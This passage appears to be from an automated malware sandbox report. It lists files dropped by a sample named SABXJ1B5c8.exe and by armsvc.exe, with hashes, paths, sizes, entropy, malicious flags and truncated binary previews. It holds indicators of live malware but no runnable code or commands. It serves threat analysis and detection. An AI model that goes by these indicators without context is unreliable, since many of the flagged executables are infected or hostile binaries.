                                                                                                                                                        SSDEEP:12288:YIhEiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:pO/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:CC3B53E6CA1259DF0ED89F9165A42DD1
                                                                                                                                                        SHA1:85626BDC5C4CCB4AC92637E33811E978AA6B4100
                                                                                                                                                        SHA-256:000ACB807C8DDD7884267577313716B2806710124CBA5CB140EECDA09E78EE4C
                                                                                                                                                        SHA-512:5FE974DACCDEDE4C5591F15B0F44FB06BDD3490913117854CAD98EC58D1D4B77B32C05394C415668FBC5A99B61D34779D8685485056D045242678F04EC87780D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...`...0......................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1687552
                                                                                                                                                        Entropy (8bit):5.015366238533728
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:S8oRswt2ioQ3J+Rr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:S8oRxoFrLNiXicJFFRGNzj3
                                                                                                                                                        MD5:A1495AE55A10F691C1A9440C59554B50
                                                                                                                                                        SHA1:841B965513B616E85D2787846F94B6C5441FA335
                                                                                                                                                        SHA-256:1E5C0D18DAE353DCA328B81ED7E86CDF3C04442E42F6F1A1CE980FBD0407A50A
                                                                                                                                                        SHA-512:6B5A52D42E3608526E46C6EE8034AAAF62750D3BEB5469190ACF43F6BD0D2B8B5CCCC8C85DF153453004E245C2539EC5A2F75CE2CD1383877A26A314816C37DF
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@..............................%.....1..... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...`........... ..............@...........................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1497600
                                                                                                                                                        Entropy (8bit):4.791111470211251
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:yf8HQlTMxHwJ07wy/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ykHQlawJ01LNiXicJFFRGNzj3
                                                                                                                                                        MD5:D2817CD8C5040C9B1BC160FBB10337CE
                                                                                                                                                        SHA1:E8A6895C0AFB5308510C532D12515D59B86A02EC
                                                                                                                                                        SHA-256:9CDCC17A8F5F48C0A115DAC57170DB814E558AC77842CFF48D6FC6259E2D123B
                                                                                                                                                        SHA-512:A2CE2DB80E7B93A34B0A16754BAA4A8359270BAB7328AD8287EA2D1D1919EEAC90FFC28B20BA9293B47CE552A7C9A2156B687ED8032E8F370E138C6592875DB0
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@..............................!.....9..... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...`...........:..............@...................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1534464
                                                                                                                                                        Entropy (8bit):7.117173668027635
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:ISEmYD6gjGPG45QVDkfX4lyTyU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:I5mYD6g2GWQVQfeyTnLNiXicJFFRGNzb
                                                                                                                                                        MD5:FED7B0D58B833A1C0F7C8024CAB81AA0
                                                                                                                                                        SHA1:96EB41FB673280261D5D7163F6ADE0D5A7F160FC
                                                                                                                                                        SHA-256:C8666ABCBCB55ABFCF18A12C4394279A92C4597EBA241E132D9A3BD46A64D88B
                                                                                                                                                        SHA-512:C5714CB1FF1D991A967B9FDDBCD3BC85F9593ACA5A6CB7937AFD321E89B1F136EE79798E980589B59806214B2FCA14DFE477191799698A7DBEC9B0B2DDD66F60
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@.......................................... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):62658
                                                                                                                                                        Entropy (8bit):7.9111697667106595
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:TDPBas9m869JEJxTHjFYXw1Q2Map3N6VFi34ofux9zfF6XcaoGjQ6:fPwU69ADFYgh2Pioofux9zfwt
                                                                                                                                                        MD5:A491FD8774FDEA49C4F788E056EA1A6A
                                                                                                                                                        SHA1:B559F1DD8A59988F0F19BBD78B19CCAAE00AEEA3
                                                                                                                                                        SHA-256:A8276CEC57284A950D43EB704D4EB0ED72350C073C83E2B21F2674DB6A127FD7
                                                                                                                                                        SHA-512:6B04D6ADD3C4E4B8294078FE1FB4E4BAB17480311060BC6AAC3CA1655EE9CF24F45AFAE0B6878F5BB9E0DD74E07D83BC5F7C092142A614FD92F77A86167269B1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:EA06..n...{.9.>aD.Nh.}...H....JD....*...nj...O .4....j......'....?.."...._K.N.....[[..$....E!.O..;...d..3+..B..'f...U..).?.~.......Q.3*$..8..hsJ8..(;.."...4=...r.W.X..J5"sA.4.,.s[p.B....l./..+..%`.i.U..0.\U@4;..U..0...1.c..._6.kO...}...e..9...vce........&S...iP..h...rO5.........i,.cW...',..!2..%.._..."^gRj..D.M@....&j.@...P..T.{....6..f............"..NG......8...=..<.J..:.....5..6wS.R....... .....^...0..)...`.$..........J..K......W.4+@.......z....R'v.>q].Z.S...3.....4.......<......0.`.Xj...^..DP.4..?.J.U.u>g..O.z.^.H...J..k...(1..B...4...E.S.v.T....6).H..b....4... ...&.. .....G.U...."....(...e.Jk...n.b... .......`V%....3I.H.....^.k.S.....W../.*.*..lN._....i.S....b.g.U..Y.....Qo..B...L(....O.A..X.T.....k..4.S..`...=.......{W...`..+..[.|...4..........P....9..i....u..u.........*.*.z#0.X1.Z..qU....e*{8..n.(..K..n..X..e.Y..2e...Z\@k[T...n,....n.R...->qU.P)0....*.....|.u].........Q.......4).i.x...R(|.m>aE..z....4..l"`..7.a..(Q......j
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):93696
                                                                                                                                                        Entropy (8bit):6.755227743342787
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:c+Nmmtlei4peeTiuxFS2I6ASXlO7S5aC9Q8Vz+Ba/q1Egf8CR/cCZ+z7hhIkyl8F:nNF4peeZxF9A97mQUzoa/q7pcCZ+fPkE
                                                                                                                                                        MD5:56595A9D5814D52213825A99B8A10572
                                                                                                                                                        SHA1:528D484EA5D1E8D099BE1E0AF019569268031690
                                                                                                                                                        SHA-256:7E579893373B4B03BA28248DA864E4A5210B3C84457FE6157EDBEB5EADF39D1D
                                                                                                                                                        SHA-512:532F4C930256B4FA15BBD358A69F4EEEF6E6A526A73CEF4F1D1561912E5D93C80EB50B325D0AE02FCD70FF3B491C6E137067B3A75822DA57195B78E011CBE8B4
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:u..C7O0DL9EW..WH.4O0DH9E.O8WHC4O0DH9EWO8WHC4O0DH9EWO8WHC4O0D.9EWA'.FC.F.e.8..nl?!0.?B+/K$:o[6&-[;.&-.7"!.>&cp.cd%V!2a5ZBg4O0DH9E..8W.B7O.~=.EWO8WHC4.0FI2D.O83IC4G0DH9EWA.VHC.O0D.8EWOxWHc4O0FH9AWO8WHC4K0DH9EWO8.IC4M0DH9EWM8..C4_0DX9EWO(WHS4O0DH9UWO8WHC4O0DH..VOsWHC4.1D.<EWO8WHC4O0DH9EWO8WH.5O<DH9EWO8WHC4O0DH9EWO8WHC4O0DH9EWO8WHC4O0DH9EWO8WHC4O0dH9MWO8WHC4O0DH1eWOpWHC4O0DH9EWaL2074O0P*8EWo8WH'5O0FH9EWO8WHC4O0DH.EW/.%;1WO0D.<EWO.VHC2O0D.8EWO8WHC4O0DH9.WOxy:&X SDH5EWO8.IC4M0DHUDWO8WHC4O0DH9E.O8.HC4O0DH9EWO8WHC4..EH9EWOpWHC6O5DP.EW.WH@4O0.H9C7.8W.C4O0DH9EWO8WHC4O0DH9EWO8WHC4O0DH9EWO8WHC4O0.5.J...>;..O0DH9EVM;SNK<O0DH9EWOFWHCrO0D.9EWx8WHf4O0)H9EsO8W6C4ONDH9!WO8%HC4.0DH~EWOWWHCZO0D69EWQ:.WC4E.bH;mwO8]Hi.<.DH3.VO8S;a4O:.J9ES<.WHI.L0DLJaWO2.LC4KCaH9O.J8WLinO3.^?EWTWoHC>O3.]?EWT.qHA.v0DB9oqO;.]E4O+nj9G.F8WLib<-DH?m.O8]<J4O2.B9ESe&U`.4O:njGVWO<|Hi.1$DH=nWe.)]C4K.Db.;AO8ScC.mNSH9A|O.Qb!4=.HHIF8.8WNk.O0N`yEWI8}rCJA0DL;*.O8]ni.O..H9CWgnWHE4gcDH?E..8WNC..0DN9omO..HC2O..H9CWe.W6p4O4hOGvWO<|^=.O0@.?=W
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):12320
                                                                                                                                                        Entropy (8bit):7.985057379712873
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:54jAridaOzU23EnvRhb3UpohFiwqpvtGR2RIhAqp4OVYmWoM/C0kK08bcD:+WrSU232vT3Uw2HOVYYOkOcD
                                                                                                                                                        MD5:0638783A5C25BD6A3BA52821A7846926
                                                                                                                                                        SHA1:B1FEA1B83627A07D7EB788CD1CC8C7EDDDE5FB91
                                                                                                                                                        SHA-256:FE654F5CE4CDC324DFD9D1B976771A80AEDEA4502C3D5E1DF3A19F347F61E275
                                                                                                                                                        SHA-512:D863A984F804E6A1F836A33485DCA52007179A1C17735E2CBC970C8CC776F67D3EB38B9FB57C21F61BEAD2C4284C7CFBCB4E756F5240696D999F486EBA9EE5E8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:B.7ug...17v61|.:....P.g.(.tz<,.{;...2..@FJ..#...H.0....7.t.X]D..v.....z...j..m..?.2?2)..PG...*.H.;...b....P..F`.....f.,.@....]e...Dl..&}; "..k.+.._o.G.....<C.'5..........;....v....#..z.>..,W..p0..),.Mj.s.&...&. .}N.sc.R.>D...X..?..s.$...2.g.....'.@.4.........if.{."@~...g... ^Xgb.E.e.:.J..&.,.x....qkK...\......;..%..7f...A...!5Z...>1s../..p.....N.,,:}.E..Y9M.T..g..;e&h.=e.q.[....?_.!_<#...s....Jd.f'...P......(t..A}.._.#.?.h.}.y../....pZf.....I....C...8,...J.t[SX..g.c...p....k..b.....nW.....9...b...;5b.3.x.g.>...^..3..Z.{0,.-C...G.....$Gs...HTl.7.;V.r...k.._..=.j`[...n.oy*.u..n....ezn!.D.e.,...Y...C.F.I..8V.h...{..-..w....p9?.03P..p.g.].>M.bP....%.5.$3+..7c`...w..S(..#..A.fsp.a.FT;._p.7...L.../..7.,......I..0..1.$%.NxS.5.3..k....G...{........eXbL..~Hi;....C.K~w..#jK.CX1C...M.....f..@}.V......S'.....d.....@.}....'.[.. .s...m.]/.2p.B.il....h*..dKuX.*....`...'.T.=_j..;.9.%...x..Y.....6...v..`I.hp*............d..}...'...X..?b.z..1.2...=iS2Y./5.na.
                                                                                                                                                        Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):2313
                                                                                                                                                        Entropy (8bit):5.131925132472158
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786n:Z070s0Y0q0mF7Dm50
                                                                                                                                                        MD5:70249346EBF27BDF3C0D434E9F60BE9F
                                                                                                                                                        SHA1:68FB0660AD175469597EBBFC22A4C453B6EED3A1
                                                                                                                                                        SHA-256:5BDCADB768883EFA9E7F784632213971C3CC972EE54C3D3DDC5FF6616CD5E189
                                                                                                                                                        SHA-512:7E7981BBE7F9B0AAF6EC669D06C5B4B5F78BFF6DE87AF5845ECC957F1D70C7A3A82C3D0702DE56B78099FF03C3AA919440BFB0CE6DB75A16C3D4700F320404DB
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy
                                                                                                                                                        Process:C:\Windows\System32\wbengine.exe
                                                                                                                                                        File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "\330e\332e"
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):40960
                                                                                                                                                        Entropy (8bit):0.9463441448509504
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:jzVl/iIkT6b8PPqNH7KdaasesPssBSPHDxV/3SoPxPTPfhPkFEE0yp:1l/iI9517v+Dxdzmp
                                                                                                                                                        MD5:9C71B88F4A62B1D773FE54FEC84FCD68
                                                                                                                                                        SHA1:47AB4D56E55D0314690FCCD13A37C374B5569E5B
                                                                                                                                                        SHA-256:1E6AADE5CD81176FF9AC7F900BE2341F4CBFDEFA47027893030A293956F028B9
                                                                                                                                                        SHA-512:25AECECB63D60D4DB1D00AFB4404C12A1B8BEBE99ED29E050C228513AD82EDDCEAB4A4D7431B9DB6E1AED16E75C878D2D3899C18A81DCCDCF0866FD8FC380A57
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:.(..@...@...........................................!....................................e.e.............(......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...............................................................|.............}.c..........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P..........e.e................................................................8.B..e.e....19041.1.amd64fre.vb_release.191206-1406.....,.@..e.e...............'"a.-....spp.pdb...........@..e.e.....T.c..i.\.C.s"8@....vssvc.pdb......./.@..e.e....W.p.D.......]....vssapi.pdb......-.@..e.e.....\..Q....T*&.......udfs.pdb........0.@..e.e......B..,`..9..4.....ifsutil.pdb.....-.@..e.e....I:...S%9.`...'.R....uudf.pdb........1.@..e.e...........1$OI"......wbengine.pdb................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):12320
                                                                                                                                                        Entropy (8bit):7.98353846085498
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:ffkaWSOq4Ry6JTCB4hN/Ew0YEN1qjcGj568fYO9vZT0Bu3oOCDNWfmSZ+PqRV:fcS4UMTCOzEwYNMwO8gTCQuSD
                                                                                                                                                        MD5:593C245C0F51D40B9D33D88D1121131D
                                                                                                                                                        SHA1:B8F00EFC587091364C669239EC84CDC3A11F80B2
                                                                                                                                                        SHA-256:8C963DB279B9DD4742186DC353ED253E39DA002A6B48539C2FDDF66A2372C78E
                                                                                                                                                        SHA-512:A57F21C44AF90310822B06E08C570E99A16B0D592F09D60DB3DE33692779E1BC3085ACE4893C5D7EC8712F9A9B532064FBC0B953D106FC394C0A894C5AFCCF5A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:<........mT.U..%sowY.....;........8.?.....I=...Bp.kAT.]..=A!.........._.........e...UL.bQ.u.h.g.(a.........b..T..$O..@.........h.l...0.g'.. VY..O._SY\...iR.........T...\NW.\.q.H.zB..'.r.$...=.\.....4PdU......N".=..:...DW........]:X.....Y;...s5........$.7......u.Q.'.eD\.(.`.\5.]$.._......Yv...k.)...?..$n...U..Sb..\..~..+......9.....wI!.........RM".w...N.5J.w.|....p...ym......*..?............3..C.1_.M..W5=.=.......4.......aU*.L..13....#.#...0.o.;...0.X...n.r3.<./..0.t0....$...R..o."q2.".B..b..|......&Qp.|.V.;.^..8....xb..~..B......3.^.BI..vZE........1.+P|.$.....P..o4........9.[{_I.j2*.<.T.D.{L.W[.b)...aCJ.....#7........Y....^...L.{..\...]...]w....pl...y;..1no6|.g.......z.`..>B.W..h....n..+..$...K...b.....[(.i3<......yG..$=%p.[c.x...:.^....yv`.A.M....&..9u. z[..|A.GV>cR...-...4.Y._@...*d....(.uV....Q.....0g D.*..vT..._.....J..V.....}...&...7XB.. ;....)....B....Rb../.20...a...*3.p.....l....x..../hSU.E..n..............J.>H..g..
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1306624
                                                                                                                                                        Entropy (8bit):4.538233339685017
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:rmiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:rQ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:D2EB808FBCC7D13A4EA0C8C57F14F0DF
                                                                                                                                                        SHA1:86D51F84647ECBC480BDBE73C16CCE359BE5FB79
                                                                                                                                                        SHA-256:5B30BCEEAB82BE3EEA7A8161C927F2D4AD79FFE272A45DEEA064E1EE631E9AEA
                                                                                                                                                        SHA-512:B56A98CCC1999025E05AE8E3296B6DDC0F0D3B4D77A5C90653B3671C3EB5FFD1AB933DE1B0DA927122C56457B10D8EA271F6071FBBC601C7DE28C14B0027E782
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@............................................. ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...`...........P..............@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                        Entropy (8bit):6.967185788926958
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:RwVFr68Vw9wn/6h8p1zidgLNiXicJFFRGNzj3:RwVFrssCndg7wRGpj3
                                                                                                                                                        MD5:F961BCB08DA0BBC74AD876A875708B98
                                                                                                                                                        SHA1:5CAF2D358AF9CEEBF5B0980FA478903C79E70188
                                                                                                                                                        SHA-256:BE6DC3379E7760C6599677BF5A0C25A52AEFDD364356C18A1EB2A2736082D0DB
                                                                                                                                                        SHA-512:0C0F02EECAD0A9E82991B02112519F300439AD85477F789A47A5914FA41EE52F9846B4088855AEF22A65D928652D5B6E5215EBD67408D25701B11A674BC78243
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@.....................................S.... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1348608
                                                                                                                                                        Entropy (8bit):7.243413680636865
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:nQW4qoNUgslKNX0Ip0MgHCp+MBOu4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:nQW9BKNX0IPgi8MBOu4LNiXicJFFRGNf
                                                                                                                                                        MD5:0E6695AE9B36C10F1BA14DBAD66572E9
                                                                                                                                                        SHA1:4DCF7B0285FE64C0D6EA33CC846734F30BA574EF
                                                                                                                                                        SHA-256:F8BF1FDE7C6B6196164B1DE1776C7977E1211523ABD69FF4C9C8CC0A86F30309
                                                                                                                                                        SHA-512:B9D81C04BE6D30E374835C23C482ED18016E8EA4635D15199B87741450D117F059D0F90C80320655CBA677998D49D0F5FE372B2AC856AD58F843C284858E6B34
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@....................................MP.... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1379840
                                                                                                                                                        Entropy (8bit):4.681784079551705
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:u2G7AbHjkr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:u2G7AbHjuLNiXicJFFRGNzj3
                                                                                                                                                        MD5:0983D098AAD9ED161057E6E24707DC86
                                                                                                                                                        SHA1:B76E89B692503C6E9B1B4AA3648D0447D8605955
                                                                                                                                                        SHA-256:F329950697612484ECF1A6C5D821CA4E52E6F55F0E6B7A081CD159ECD125D738
                                                                                                                                                        SHA-512:723AF7A54757D8B8474234711892797547164736441D53D43558DDEBDA800CAFA3230B0A5468B56F756E4DF6C478A75F1724FEA44F0F21094503C983169A0BBE
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.............................. ........... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...`...........n..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1242624
                                                                                                                                                        Entropy (8bit):7.28027672701469
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:XkdpSI+K3S/GWei+qNv2wG3D/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:X6SIGGWei2wG3DLNiXicJFFRGNzj3
                                                                                                                                                        MD5:E72AE34F3044B7578B086D583E378596
                                                                                                                                                        SHA1:1547CC9E489A426503B1D6AB60E022641A090B11
                                                                                                                                                        SHA-256:B588EEDF02C01E51722BB8E394F0A6B3A0409A907023E613474D5A07D5CF9A52
                                                                                                                                                        SHA-512:F1885C8E772994B1DDDF3DBE7315C30BDA38EEFDE8280BDD82341D8A88492358821977C4F64DF498FBC1DEA1A7306F7605FD4DE1394C76773191E91C0C04008B
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P.......E.... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1296896
                                                                                                                                                        Entropy (8bit):4.5156261307932
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:QyiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:QU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:71243E5DD99FDE1B251313A997589A0A
                                                                                                                                                        SHA1:B6552361289D5BD4967878EB94F91C542E425076
                                                                                                                                                        SHA-256:7EDA6F0D526314BEAAB0DF031F16E709A533B4B23DA74B093D26CF8E9959CBFA
                                                                                                                                                        SHA-512:073769B4EC84BA7194A745CF648746AA76E3AA7B8FF4EA9BA141E09E3B4989069F127B94B00B410679F1647EDC479A5464E0285F2BA240EDE7E529A5341D1734
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.......................................... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...`...`.......*..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):16384
                                                                                                                                                        Entropy (8bit):0.3223842583024382
